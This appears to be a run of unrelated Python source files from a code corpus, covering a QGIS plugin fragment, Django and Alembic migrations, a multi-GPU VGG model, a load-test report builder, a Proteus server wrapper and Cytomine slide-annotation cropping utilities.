self.output_layer = QgsVectorLayer(self.output_file, base_name, "ogr")
if self.output_layer.isValid():
QgsProject.instance().addMapLayer(self.output_layer)
elif self.data_type == 'raster':
self.output_file = self.input_dataset.split(os.extsep)[0] + "_" + str(self.longitude_range) + ".tif"
if os.path.exists(self.output_file):
msg.setText("Cannot overwrite existing file " + os.path.basename(self.output_file))
msg.exec_()
self.run()
else:
process_raster_file(self.input_dataset, self.longitude_range, self.output_file)
file_info = QFileInfo(self.output_file)
base_name = file_info.baseName()
if self.dlg.add_to_toc.isChecked():
self.output_layer = QgsRasterLayer(self.output_file, base_name)
if self.output_layer.isValid():
QgsProject.instance().addMapLayer(self.output_layer)
elif self.selected_tab == "layer":
# process layer
self.input_layer = self.dlg.layer_combobox.currentLayer()
if self.input_layer.type() == QgsMapLayerType.VectorLayer:
self.data_type = "vector"
elif self.input_layer.type() == QgsMapLayerType.RasterLayer:
self.data_type = "raster"
else:
msg.setText("Input dataset must be vector or raster")
msg.exec_()
if not self.input_layer.crs().isGeographic():
msg.setText("Input dataset must have geographic coordinate system (such as WGS84)")
msg.exec_()
else:
if self.input_layer.isValid():
if self.data_type == "vector":
self.output_layer = process_vector_layer(self.input_layer, self.longitude_range)
else:
raster_in_file = self.input_layer.dataProvider().dataSourceUri()
if os.path.exists(raster_in_file):
raster_out_file = os.path.join(raster_in_file.split(os.extsep)[0] + "_" + str(self.longitude_range) + os.extsep + raster_in_file.split(os.extsep)[1])
self.output_layer = process_raster_file(raster_in_file, self.longitude_range, raster_out_file)
else:
msg.setText("Input layer is not valid for some reason")
msg.exec_()
QgsProject.instance().addMapLayer(self.output_layer)
|
python
|
# Generated by Django 3.0.5 on 2020-04-06 15:06
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shortner', '0002_auto_20200331_0717'),
]
operations = [
migrations.AlterModelOptions(
name='entry',
options={'verbose_name_plural': 'entries'},
),
]
|
python
|
from numpy import diff
def check_sorted(nu___):
di_ = diff(nu___.ravel())
return (di_ <= 0).all() or (0 <= di_).all()
|
python
|
'''VGG for CIFAR10. FC layers are removed.
(c) YANG, Wei
'''
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import math
import torch
__all__ = ['vgg19_bn_para']
class VGG(nn.Module):
def __init__(self, features, gpu_num = 2, num_classes=1000, split_size=64):
super(VGG, self).__init__()
self.split_size = split_size
self.gpu_para = gpu_num
self._initialize_weights()
if gpu_num == 0:
self.features = features.cuda("cuda:0")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:0")
if gpu_num == 2:
self.features_1 = features[0:27].cuda("cuda:0")
self.features_2 = features[27:].cuda("cuda:1")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:1")
elif gpu_num == 4:
self.features_1 = features[0:14].cuda("cuda:0")
self.features_2 = features[14:27].cuda("cuda:1")
self.features_3 = features[27:40].cuda("cuda:2")
self.features_4 = features[40:].cuda("cuda:3")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:3")
elif gpu_num == 10:
self.features_1 = features[0:3].cuda("cuda:0")
self.features_2 = features[3:7].cuda("cuda:1")
self.features_3 = features[7:10].cuda("cuda:2")
self.features_4 = features[10:14].cuda("cuda:3")
self.features_5 = features[14:20].cuda("cuda:4")
self.features_6 = features[20:27].cuda("cuda:5")
self.features_7 = features[27:33].cuda("cuda:6")
self.features_8 = features[33:40].cuda("cuda:7")
self.features_9 = features[40:49].cuda("cuda:8")
self.features_10 = features[49:].cuda("cuda:9")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:9")
elif gpu_num == 5:
self.features_1 = features[0:10].cuda("cuda:0")
self.features_2 = features[10:20].cuda("cuda:1")
self.features_3 = features[20:30].cuda("cuda:2")
self.features_4 = features[30:40].cuda("cuda:3")
self.features_5 = features[40:].cuda("cuda:4")
self.classifier = nn.Linear(512, num_classes).cuda("cuda:4")
def forward(self, x):
if self.gpu_para == 4:
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.features_1(s_next).cuda("cuda:1")
ret = []
for s_next in splits:
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
s_prev = self.features_1(s_next).cuda("cuda:1")
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
x = torch.cat(ret)
elif self.gpu_para == 0:
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
elif self.gpu_para == 2:
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.features_1(s_next).cuda("cuda:1")
ret = []
for s_next in splits:
s_prev = self.features_2(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
s_prev = self.features_1(s_next).cuda("cuda:1")
s_prev = self.features_2(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
x = torch.cat(ret)
elif self.gpu_para == 10:
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.features_1(s_next).cuda("cuda:1")
ret = []
for s_next in splits:
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev).cuda("cuda:4")
s_prev = self.features_5(s_prev).cuda("cuda:5")
s_prev = self.features_6(s_prev).cuda("cuda:6")
s_prev = self.features_7(s_prev).cuda("cuda:7")
s_prev = self.features_8(s_prev).cuda("cuda:8")
s_prev = self.features_9(s_prev).cuda("cuda:9")
s_prev = self.features_10(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
s_prev = self.features_1(s_next).cuda("cuda:1")
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev).cuda("cuda:4")
s_prev = self.features_5(s_prev).cuda("cuda:5")
s_prev = self.features_6(s_prev).cuda("cuda:6")
s_prev = self.features_7(s_prev).cuda("cuda:7")
s_prev = self.features_8(s_prev).cuda("cuda:8")
s_prev = self.features_9(s_prev).cuda("cuda:9")
s_prev = self.features_10(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
x = torch.cat(ret)
elif self.gpu_para == 5:
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.features_1(s_next).cuda("cuda:1")
ret = []
for s_next in splits:
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev).cuda("cuda:4")
s_prev = self.features_5(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
s_prev = self.features_1(s_next).cuda("cuda:1")
s_prev = self.features_2(s_prev).cuda("cuda:2")
s_prev = self.features_3(s_prev).cuda("cuda:3")
s_prev = self.features_4(s_prev).cuda("cuda:4")
s_prev = self.features_5(s_prev)
s_prev = s_prev.view(s_prev.size(0), -1)
ret.append(self.classifier(s_prev))
x = torch.cat(ret)
else:
x = self.features_1(x)
x = self.features_2(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
n = m.weight.size(1)
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def make_layers(cfg, gpu_para, batch_norm=False):
layers = []
in_channels = 3
for index, v in enumerate(cfg):
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def vgg19_bn_para(num_classes=10, gpu_num = 2, split_size=64):
"""VGG 19-layer model (configuration 'E') with batch normalization"""
model = VGG(make_layers(cfg['E'], 2, batch_norm=True), gpu_num = gpu_num, num_classes=num_classes, split_size=split_size)
return model
|
python
|
# variants, kā importēt garākus nosaukumus
import mape.helper as helper
# importē konkrētu funkciju, tā it kā tā būtu lokāli definēta
#from helper import ievadiSkaitli
def main():
sk1 = helper.ievadiSkaitli()
sk2 = helper.ievadiSkaitli()
print("Ievadīto skaitļu summa ir", sk1 + sk2)
helper.pievienotFailam("summa.dat", sk1 + sk2)
#print(__name__)
if __name__ == '__main__':
main()
else:
print("Šī programma nav domāta importam")
|
python
|
import six
import time
from collections import defaultdict
import ujson as json
import pandas as pd
from oct.results.models import db, Result, Turret
class ReportResults(object):
"""Represent a report containing all tests results
:param int run_time: the run_time of the script
:param int interval: the time interval between each group of results
"""
def __init__(self, run_time, interval):
self.total_transactions = 0
self.total_errors = Result.select(Result.id).where(Result.error != "", Result.error != None).count()
self.total_timers = 0
self.timers_results = {}
self._timers_values = defaultdict(list)
self.turrets = []
self.main_results = {}
self.interval = interval
self._init_turrets()
def _init_dates(self):
"""Initialize all dates properties
"""
if self.total_transactions == 0:
return None
self.epoch_start = Result.select(Result.epoch).order_by(Result.epoch.asc()).limit(1).get().epoch
self.epoch_finish = Result.select(Result.epoch).order_by(Result.epoch.desc()).limit(1).get().epoch
self.start_datetime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.epoch_start))
self.finish_datetime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.epoch_finish))
def _init_dataframes(self):
"""Initialise the main dataframe for the results and the custom timers dataframes
"""
df = pd.read_sql_query("SELECT elapsed, epoch, scriptrun_time, custom_timers FROM result ORDER BY epoch ASC",
db.get_conn())
self._get_all_timers(df)
self.main_results = self._get_processed_dataframe(df)
# create all custom timers dataframes
for key, value in six.iteritems(self._timers_values):
df = pd.DataFrame(value, columns=['epoch', 'scriptrun_time'])
df.index = pd.to_datetime(df['epoch'], unit='s')
timer_results = self._get_processed_dataframe(df)
self.timers_results[key] = timer_results
# clear memory
del self._timers_values
def _get_all_timers(self, dataframe):
"""Get all timers and set them in the _timers_values property
:param pandas.DataFrame dataframe: the main dataframe with row results
"""
s = dataframe['custom_timers'].apply(json.loads)
s.index = dataframe['epoch']
for index, value in s.iteritems():
if not value:
continue
for key, value in six.iteritems(value):
self._timers_values[key].append((index, value))
self.total_timers += 1
del dataframe['custom_timers']
del s
def _get_processed_dataframe(self, dataframe):
"""Generate required dataframe for results from raw dataframe
:param pandas.DataFrame dataframe: the raw dataframe
:return: a dict containing raw, compiled, and summary dataframes from original dataframe
:rtype: dict
"""
dataframe.index = pd.to_datetime(dataframe['epoch'], unit='s', utc=True)
del dataframe['epoch']
summary = dataframe.describe(percentiles=[.80, .90, .95]).transpose().loc['scriptrun_time']
df_grp = dataframe.groupby(pd.TimeGrouper('{}S'.format(self.interval)))
df_final = df_grp.apply(lambda x: x.describe(percentiles=[.80, .90, .95])['scriptrun_time'])
return {
"raw": dataframe.round(2),
"compiled": df_final.round(2),
"summary": summary.round(2)
}
def _init_turrets(self):
"""Setup data from database
"""
for turret in Turret.select():
self.turrets.append(turret.to_dict())
def compile_results(self):
"""Compile all results for the current test
"""
self._init_dataframes()
self.total_transactions = len(self.main_results['raw'])
self._init_dates()
|
python
|
# Code generated by `typeddictgen`. DO NOT EDIT.
"""V1SubjectRulesReviewStatusDict generated type."""
from typing import TypedDict, List
from kubernetes_typed.client import V1NonResourceRuleDict, V1ResourceRuleDict
V1SubjectRulesReviewStatusDict = TypedDict(
"V1SubjectRulesReviewStatusDict",
{
"evaluationError": str,
"incomplete": bool,
"nonResourceRules": List[V1NonResourceRuleDict],
"resourceRules": List[V1ResourceRuleDict],
},
total=False,
)
|
python
|
# Copyright 2021 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provides the Server class.
Classes:
Server - provides methods to start/stop the Proteus server
"""
import os
import subprocess
from typing import Optional
import shutil
from .exceptions import InvalidArgument
class Server:
"""
The Server class provides methods to control the Proteus server.
"""
def __init__(self, executable: Optional[str] = None, http_port: int = 8998):
"""
Construct a server object
Args:
http_port (int): HTTP port to use for the server
"""
self.pid: int = 0
self.http_port = http_port
self.executable = None
if executable is None:
root = os.getenv("PROTEUS_ROOT")
if root is not None:
try:
with open(root + "/build/config.txt", "r") as f:
build = f.read().replace("\n", "").split(" ")[0]
except FileNotFoundError:
build = "Debug" # try for Debug by default
local_server_path = f"{root}/build/{build}/src/proteus/proteus-server"
if os.path.exists(local_server_path):
self.executable = local_server_path
if self.executable is None:
if shutil.which("proteus-server") is None:
raise InvalidArgument(
"Path to proteus-server cannot be derived. Specify the path explicitly or add it to the PATH"
)
else:
# use the proteus-server that exists on the PATH
self.executable = "proteus-server"
else:
self.executable = executable
def start(self, quiet=False):
"""
Start the proteus server
Args:
quiet (bool, optional): Suppress all output if True. Defaults to False.
"""
proteus_command = [self.executable, "--http_port", str(self.http_port)]
if quiet:
p = subprocess.Popen(
proteus_command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
else:
p = subprocess.Popen(proteus_command)
self.pid = p.pid
def stop(self, kill=False):
"""
Stop the proteus server
Args:
kill (bool, optional): Use signal 9 to kill. Defaults to False.
"""
signal = "-9" if kill else "-2"
if self.pid:
subprocess.call(["kill", signal, str(self.pid)])
self.pid = 0
|
python
|
import os
from abc import abstractmethod
from collections import defaultdict
import PIL
import cv2
import math
import numpy as np
import sldc
import torch
from PIL import Image
from cytomine.models import Annotation
from rasterio.features import rasterize
from shapely import wkt
from shapely.affinity import translate, affine_transform
from shapely.geometry import box
from shapely.geometry.base import BaseGeometry
from sldc import TileTopology
from sldc.image import FixedSizeTileTopology, DefaultTileBuilder
from sldc_cytomine import CytomineTileBuilder, CytomineSlide
from torch.utils.data import DataLoader
from torch.utils.data.dataset import Dataset
from torchvision import transforms
class PilImage(sldc.Image):
def __init__(self, filepath):
self._filepath = filepath
self._image = cv2.imread(self._filepath)[:, :, ::-1]
@property
def image(self):
return self._image
@property
def height(self):
return self.image.shape[0]
@property
def width(self):
return self.image.shape[1]
@property
def channels(self):
return self.image.shape[-1]
@property
def np_image(self):
if self.image.ndim == 0:
raise ValueError("image empty '{}'".format(self._filepath))
return self.image
def powdiv(v, p):
return v / (2 ** p)
def convert_poly(p, zoom, im_height):
"""Move a polygon to the correct zoom level and referential"""
polygon = affine_transform(p, [powdiv(1, zoom), 0, 0, powdiv(1, zoom), 0, 0])
return affine_transform(polygon, [1, 0, 0, -1, 0, im_height])
class BaseAnnotationCrop(object):
@abstractmethod
def random_crop_and_mask(self):
pass
@abstractmethod
def crop_and_mask(self):
pass
class AnnotationCrop(BaseAnnotationCrop):
def __init__(self, wsi, annotation, working_path, tile_size=512, zoom_level=0, n_jobs=0, intersecting=None):
self._annotation = annotation
self._tile_size = tile_size
self._wsi = CytomineSlide(wsi, zoom_level=zoom_level)
self._builder = CytomineTileBuilder(working_path, n_jobs=n_jobs)
self._working_path = working_path
self._zoom_level = zoom_level
self._other_annotations = [] if intersecting is None else intersecting
self._other_polygons = [self._annot2poly(a) for a in self._other_annotations]
@property
def tile_size(self):
return self._tile_size
@property
def wsi(self):
return self._wsi
@property
def image_instance(self):
return self._wsi.image_instance
@property
def annotation(self):
return self._annotation
@property
def polygon(self):
return self._polygon()
@property
def image_box(self):
return self._extract_image_box()
def _get_start_and_size_over_dimension(self, crop_start, crop_size, wsi_size):
start = crop_start
size = crop_size
if crop_size < self._tile_size:
start = crop_start + (crop_size - self._tile_size) // 2
size = self._tile_size
# make sure that the tile is in the image
start = max(0, start)
start = min(start, wsi_size - size)
if start < 0:
raise ValueError("image is smaller than the tile size")
return start, size
def _extract_image_box(self):
crop_width, crop_height = self._crop_dims()
crop_x_min, crop_y_min, crop_x_max, crop_y_max = self._crop_bounds()
image_x_min, image_width = self._get_start_and_size_over_dimension(crop_x_min, crop_width, self._wsi.width)
image_y_min, image_height = self._get_start_and_size_over_dimension(crop_y_min, crop_height, self._wsi.height)
return (image_x_min, image_y_min), image_width, image_height
def _get_image_filepath(self):
(x, y), width, height = self._extract_image_box()
return os.path.join(self._working_path, "{}-{}-{}-{}-{}-{}.png").format(self._zoom_level, self.image_instance.id, x, y, width, height)
def _download_image(self):
filepath = self._get_image_filepath()
if not os.path.isfile(filepath):
(x, y), width, height = self._extract_image_box()
tile = self._wsi.tile(self._builder, (x, y), width, height)
image = PIL.Image.fromarray(tile.np_image)
image.save(filepath)
return filepath
def download(self, verbose=False):
if verbose:
print("download '{}'".format(self._get_image_filepath()))
return self._download_image()
def _polygon(self):
return self._annot2poly(self._annotation)
def _annot2poly(self, annot):
polygon = wkt.loads(annot.location)
return convert_poly(polygon, self._zoom_level, self.wsi.height)
def _crop_bounds(self):
"""at the specified zoom level"""
x_min, y_min, x_max, y_max = self._polygon().bounds
return int(x_min), int(y_min), math.ceil(x_max), math.ceil(y_max)
def _crop_dims(self):
x_min, y_min, x_max, y_max = self._crop_bounds()
return x_max - x_min, y_max - y_min
def _robust_load_crop(self, x, y):
attempts = 0
filepath = self._get_image_filepath()
while True:
try:
return Image.open(filepath).crop([x, y, x + self._tile_size, y + self._tile_size])
except OSError as e:
if attempts > 3:
raise e
print("recreate '{}'".format(filepath))
os.remove(filepath)
self.download()
def _robust_load_image(self):
attempts = 0
filepath = self._get_image_filepath()
while True:
try:
return Image.open(filepath)
except OSError as e:
if attempts > 3:
raise e
print("recreate '{}'".format(filepath))
os.remove(filepath)
self.download()
def random_crop_and_mask(self):
"""in image coordinate system"""
(x_min, y_min), width, height = self._extract_image_box()
x = np.random.randint(0, width - self._tile_size + 1)
y = np.random.randint(0, height - self._tile_size + 1)
crop = self._robust_load_crop(x, y)
mask = self._mask(x, y, self._tile_size, self._tile_size)
return (x, y, self._tile_size, self._tile_size), crop, Image.fromarray(mask.astype(np.uint8))
def crop_and_mask(self):
"""in image coordinates system, get full crop and mask"""
_, width, height = self._extract_image_box()
image = self._robust_load_image()
mask = self._mask(0, 0, width, height)
return image, Image.fromarray(mask.astype(np.uint8))
def _mask(self, window_x, window_y, window_width, window_height):
(crop_x, crop_y), crop_width, crop_height = self.image_box
ground_truth = [self._polygon()] + self._other_polygons
window = box(0, 0, window_width, window_height)
fg = [translate(g, xoff=-(window_x + crop_x), yoff=-(window_y + crop_y)).intersection(window)
for g in ground_truth]
fg = [p for p in fg if not p.is_empty]
if len(fg) > 0:
mask = rasterize(fg, out_shape=(window_height, window_width), fill=0, dtype=np.uint8) * 255
else:
mask = np.zeros([window_height, window_width])
return mask
@property
def intersecting(self):
return self._other_annotations
@property
def sldc_image(self):
return PilImage(self._get_image_filepath())
@property
def sldc_window(self):
xmin, ymin, _, _ = self._crop_bounds()
width, height = self._crop_dims()
return self._wsi.window((xmin, ymin), width, height)
def topology(self, width, height, overlap=0):
base_topology = TileTopology(self.sldc_image, tile_builder=self.tile_builder, max_width=width, max_height=height, overlap=overlap)
return FixedSizeTileTopology(base_topology)
@property
def tile_builder(self):
return DefaultTileBuilder()
class AnnotationCropWithCue(BaseAnnotationCrop):
def __init__(self, crop: BaseAnnotationCrop, cue):
"""
Parameters
----------
crop: BaseAnnotationCrop
cue: ndarray
Probability map for the cue np.array of float in [0, 1]
"""
self._crop = crop
self._cue = (cue * 255)
def random_crop_and_mask(self):
crop_location, crop, mask = self._crop.random_crop_and_mask()
x, y, w, h = crop_location
final_mask = self._cue[y:(y+h), x:(x+w)]
final_mask[np.asarray(mask) > 0] = 255
return crop_location, crop, Image.fromarray(final_mask.astype(np.uint8), "L")
def crop_and_mask(self):
crop, mask = self._crop.crop_and_mask()
final_mask = self._cue
final_mask[np.asarray(mask) > 0] = 255
return crop, Image.fromarray(final_mask)
@property
def cue(self):
return self._cue
@property
def crop(self):
return self._crop
class RemoteAnnotationCropTrainDataset(Dataset):
def __init__(self, crops, image_trans=None, both_trans=None, mask_trans=None):
self._crops = crops
self._both_trans = both_trans
self._image_trans = image_trans
self._mask_trans = mask_trans
def __getitem__(self, item):
annotation_crop = self._crops[item]
_, image, mask = annotation_crop.random_crop_and_mask()
if self._both_trans is not None:
image, mask = self._both_trans([image, mask])
if self._image_trans is not None:
image = self._image_trans(image)
if self._mask_trans is not None:
mask = self._mask_trans(mask)
return image, mask
def __len__(self):
return len(self._crops)
class TileTopologyDataset(Dataset):
def __init__(self, topology, trans=None):
self._topology = topology
self._trans = trans
@property
def topology(self):
return self._topology
@property
def trans(self):
return self._trans
def __getitem__(self, item):
image = Image.fromarray(self._topology.tile(item + 1).np_image)
if self._trans is not None:
image = self._trans(image)
return item + 1, image
def __len__(self):
return len(self._topology)
def predict_roi(roi, ground_truth, model, device, in_trans=None, batch_size=1, tile_size=256, overlap=0, n_jobs=1, zoom_level=0):
"""
Parameters
----------
roi: AnnotationCrop
The polygon representing the roi to process
ground_truth: iterable of Annotation|Polygon
The ground truth annotations
model: nn.Module
Segmentation network. Takes a batch of _images as input and outputs the foreground probability for all pixels
device:
A torch device to transfer data to
in_trans: transforms.Transform
A transform to apply before forwarding _images into the network
batch_size: int
Batch size
tile_size: int
Tile size
overlap: int
Tile tile_overlap
n_jobs: int
Number of jobs available
zoom_level: int
Zoom level
Returns
-------
"""
# topology
tile_topology = roi.topology(width=tile_size, height=tile_size, overlap=overlap)
(x_min, y_min), width, height = roi.image_box
mask_dims = (height, width)
# build ground truth
roi_poly = roi.polygon
ground_truth = [(wkt.loads(g.location) if isinstance(g, Annotation) else g) for g in ground_truth]
ground_truth = [convert_poly(g, zoom_level, roi.wsi.height) for g in ground_truth]
translated_gt = [translate(g.intersection(roi_poly), xoff=-x_min, yoff=-y_min) for g in ground_truth]
y_true = rasterize(translated_gt, out_shape=mask_dims, fill=0, dtype=np.uint8)
y_pred = np.zeros(y_true.shape, dtype=np.double)
y_acc = np.zeros(y_true.shape, dtype=np.int)
# dataset and loader
dataset = TileTopologyDataset(tile_topology, trans=in_trans)
dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=n_jobs)
for ids, x in dataloader:
x = x.to(device)
y = model.forward(x, sigmoid=True)
# accumulate predictions
for i, identifier in enumerate(ids):
x_off, y_off = tile_topology.tile_offset(identifier.item())
y_pred[y_off:(y_off + tile_size), x_off:(x_off + tile_size)] += y[i].detach().cpu().squeeze().numpy()
y_acc[y_off:(y_off + tile_size), x_off:(x_off + tile_size)] += 1
# average multiple predictions
y_pred /= y_acc
# import cv2
# from datetime import datetime
# roi.annotation.dump("{}_image.png".format(roi.annotation.id), override=False)
# cv2.imwrite("{}_true.png".format(roi.annotation.id), y_true * 255)
# cv2.imwrite("{}_pred_{}.png".format(roi.annotation.id, datetime.now().timestamp()), (y_pred * 255).astype(np.uint8))
return y_pred, y_true
def datasets_size_cumsum(datasets):
sizes = np.array([len(d) for d in datasets])
cumsum = np.concatenate([np.array([0]), np.cumsum(sizes[:-1], dtype=np.int)])
return sizes, cumsum
def get_sample_indexes(index, cumsum):
dataset_index = np.searchsorted(cumsum, index, side="right") - 1
relative_index = index - cumsum[dataset_index]
return dataset_index, relative_index
class AnnotationCropTopoplogyDataset(Dataset):
def __init__(self, crop, overlap=0, in_trans=None):
self._dataset = TileTopologyDataset(crop.topology(crop.tile_size, crop.tile_size, overlap=overlap), trans=in_trans)
self._crop = crop
def __getitem__(self, item):
_id, tile = self._dataset[item]
x_off, y_off = self._dataset.topology.tile_offset(_id)
return _id, x_off, y_off, tile
def __len__(self):
return len(self._dataset)
class MultiCropsSet(Dataset):
def __init__(self, crops, in_trans, overlap=0):
"""
Parameters
----------
do_add_group: bool
True to append group identifier (optional), default: `False`.
kwargs: dict
Parameters to be transferred to the actual `ImageFolder`.
"""
super().__init__()
self._datasets = [
AnnotationCropTopoplogyDataset(crop, overlap=overlap, in_trans=in_trans)
for crop in crops]
self._sizes, self._cumsum_sizes = datasets_size_cumsum(self._datasets)
def __getitem__(self, index):
dataset_index, relative_index = get_sample_indexes(index, self._cumsum_sizes)
dataset = self._datasets[dataset_index]
return (dataset._crop.annotation.id,) + dataset[relative_index]
def __len__(self):
return self._cumsum_sizes[-1] + len(self._datasets[-1])
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
def predict_annotation_crops_with_cues(net, crops, device, in_trans=None, overlap=0, batch_size=8, n_jobs=1):
if len(crops) == 0:
return 0
dataset = MultiCropsSet(crops, in_trans=in_trans, overlap=overlap)
loader = DataLoader(dataset, batch_size=batch_size, shuffle=False,
num_workers=n_jobs, pin_memory=True, drop_last=False)
tile_size = crops[0].tile_size
n_bytes = len(dataset) * tile_size * tile_size * 4
print("> annot with cues needs approx {} of memory".format(sizeof_fmt(n_bytes)), flush=True)
all_ys = defaultdict(list)
net.eval()
for annot_ids, tile_ids, xs, ys, tiles in loader:
t = tiles.to(device)
y = torch.sigmoid(net.forward(t))
detached = y.detach().cpu().numpy()
for i, (annot_id, tile_id, x_off, y_off) in enumerate(zip(annot_ids, tile_ids, xs, ys)):
all_ys[annot_id.item()].append((tile_id.item(), (x_off.item(), y_off.item()), detached[i].squeeze()))
awcues = list()
for crop in crops:
_, w, h = crop.image_box
cue = np.zeros([h, w], dtype=np.float)
acc = np.zeros([h, w], dtype=np.int)
for tile_id, (x_off, y_off), y_pred in all_ys[crop.annotation.id]:
cue[y_off:(y_off + tile_size), x_off:(x_off + tile_size)] += y_pred
acc[y_off:(y_off + tile_size), x_off:(x_off + tile_size)] += 1
cue /= acc
awcues.append(AnnotationCropWithCue(crop, cue=cue))
del(all_ys[crop.annotation.id])
return awcues
|
python
|
#
# Copyright (c) 2019 UCT Prague.
#
# ec5cbec43ec8_initial_layout.py is part of Invenio Explicit ACLs
# (see https://github.com/oarepo/invenio-explicit-acls).
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""Initial layout."""
import sqlalchemy as sa
from alembic import op
try:
from psycopg2 import apilevel
from sqlalchemy.dialects.postgresql import JSONB as JSON
from sqlalchemy.dialects.postgresql import ARRAY
from invenio_explicit_acls.utils import ArrayType as FallbackArrayType
fallback_StringArray = FallbackArrayType(sa.String())
StringArray = ARRAY(sa.String).with_variant(fallback_StringArray, 'sqlite')
except:
from sqlalchemy.types import JSON
from invenio_explicit_acls.utils import ArrayType as ARRAY
StringArray = ARRAY(sa.String())
# revision identifiers, used by Alembic.
revision = 'ec5cbec43ec8'
down_revision = None
branch_labels = ('invenio_explicit_acls',)
depends_on = None
def upgrade():
"""Upgrade database."""
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('explicit_acls_acl',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=False),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('priority', sa.Integer(), nullable=True),
sa.Column('schemas', StringArray, nullable=True),
sa.Column('originator_id', sa.Integer(), nullable=False),
sa.Column('type', sa.String(length=50), nullable=True),
sa.Column('operation', sa.String(length=50), nullable=True),
sa.ForeignKeyConstraint(['originator_id'], ['accounts_user.id'], name=op.f('fk_explicit_acls_acl_originator_id_accounts_user'), ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id', name=op.f('pk_explicit_acls_acl'))
)
op.create_index(op.f('ix_explicit_acls_acl_originator_id'), 'explicit_acls_acl', ['originator_id'], unique=False)
op.create_table('explicit_acls_actor',
